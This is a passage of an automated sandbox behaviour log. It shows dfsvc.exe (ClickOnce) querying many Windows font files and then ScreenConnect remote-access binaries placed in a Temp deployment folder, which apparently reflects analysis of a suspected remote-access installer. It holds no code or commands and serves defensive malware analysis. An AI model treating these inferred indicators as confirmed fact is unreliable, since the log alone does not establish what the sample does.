                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Core.dll VolumeInformationJump to behavior
